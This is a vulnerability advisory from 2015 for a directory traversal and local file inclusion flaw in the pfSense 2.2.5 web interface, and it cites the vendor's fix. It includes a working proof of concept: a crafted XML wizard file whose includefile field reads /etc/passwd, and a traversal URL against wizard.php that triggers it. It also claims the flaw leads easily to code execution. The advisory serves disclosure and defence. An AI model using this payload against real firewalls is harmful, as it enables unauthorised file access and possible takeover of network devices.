# Title : PFSense <= 2.2.5 Directory Traversal # Date : 18/12/2015 # Author : R-73eN # Tested on : PFSense 2.2.5 # Software : https://github.com/pfsense/pfsense # Vendor : https://pfsense.org/ # ___ __ ____ _ _ # |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | # | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | # | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ # |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____| # # # Fix provided by the vendor https://github.com/pfsense/pfsense/commit/3ac0284805ce357552c3ccaeff0a9aadd0c6ea13 # # In pfsense <= 2.2.5 (Latest Version) , during a security audit i discovered the following vulnerabilities in the pfsense Webgui. The following files are vulnerable to a file inclusion attack wizard.php?xml= pkg.php?xml= Both of this files do not sanitize the path of the xml parameter and we can load xml files, and loading a special crafted xml file we can gain command execution. Example: 1.xml (the filename can be whatever .txt , .jpg etc because it does not check for the file extension) The content of the 1.xml should be: <?xml version="1.0" encoding="utf-8" ?> <pfsensewizard> <totalsteps>12</totalsteps> <step> <id>1</id> <title>LFI example </title> <description>Lfi example </description> <disableheader>on</disableheader> <stepsubmitphpaction>step1_submitphpaction();</stepsubmitphpaction> <includefile>/etc/passwd</includefile> </step> </pfsensewizard> the parameter <includefile> is passed to a require_once() function which triggers the File inclusion Attack. As we all know File inclusion attack can be converted to RCE very easily. Then visiting http://vulnhost/wizard.php?xml=../../../1.xml where the "xml" parameter is the path of the crafted file, will trigger the vulnerability. Thanks Rio Sherri https://www.infogen.al/ - Infogen AL